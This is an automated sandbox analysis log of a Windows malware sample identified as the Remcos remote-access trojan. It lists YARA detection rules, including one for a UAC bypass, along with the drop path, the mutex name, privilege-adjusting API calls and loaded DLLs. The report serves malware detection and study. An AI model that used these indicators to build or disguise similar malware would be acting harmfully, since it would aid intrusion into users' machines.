            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
            Source: 00000014.00000002.2309137529.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
            Source: Process Memory Space: yPIOW6yoPi.exe PID: 1612, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: yavascript.exe PID: 1512, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: yavascript.exe PID: 4196, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: Process Memory Space: yavascript.exe PID: 1352, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
            Source: yPIOW6yoPi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: yavascript.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winEXE@20/64@1/2
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_00416AB7
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_02106D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,0_2_02106D1E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00416AB7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 17_2_00766D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,17_2_00766D1E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_00416AB7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 20_2_02146D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,20_2_02146D1E
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,38_2_00416AB7
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCode function: 38_2_02196D1E GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,38_2_02196D1E
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,0_2_0040E219
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,0_2_0041A63F
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCode function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BC4
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile created: C:\Users\user\AppData\Roaming\xenorJump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4196
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1512
            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1612
            Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\8da1b0b3-9424-48ef-a006-c45180a8616aJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Software\0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Rmc-I7G9830_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Exe0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Exe0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Rmc-I7G9830_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: 0DG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Inj0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Inj0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: BG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: BG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: BG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: @CG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: BG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: exepath0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: @CG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: exepath0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: BG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: licence0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: `=G0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: XCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: dCG0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: Administrator0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: User0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeCommand line argument: del0_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Software\17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Rmc-I7G98317_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Exe17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Exe17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Rmc-I7G98317_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: 0DG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: licence17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: `=G17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: dCG17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Administrator17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: User17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del17_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: %cz17_2_007A6277
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Software\20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: (CG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Exe20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: (CG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: 0DG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: licence20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: `=G20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: dCG20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Administrator20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: User20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del20_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Software\38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: (CG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Exe38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: (CG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: 0DG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Inj38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: @CG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: exepath38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: BG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: licence38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: `=G38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: XCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: dCG38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: Administrator38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: User38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del38_2_0040D767
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeCommand line argument: del38_2_0040D767
            Source: yPIOW6yoPi.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: yPIOW6yoPi.exeReversingLabs: Detection: 71%
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeFile read: C:\Users\user\Desktop\yPIOW6yoPi.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\yPIOW6yoPi.exe "C:\Users\user\Desktop\yPIOW6yoPi.exe"
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1000
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1008
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1112
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1116
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1120
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1044
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1612 -s 1300
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4196 -s 472
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 716
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 744
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 708
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 752
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1512 -s 920
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeProcess created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe "C:\Users\user\AppData\Roaming\xenor\yavascript.exe" Jump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: msimg32.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: msvcr100.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exeSection loaded: onecorecommonproxystub.dllJump to behavior
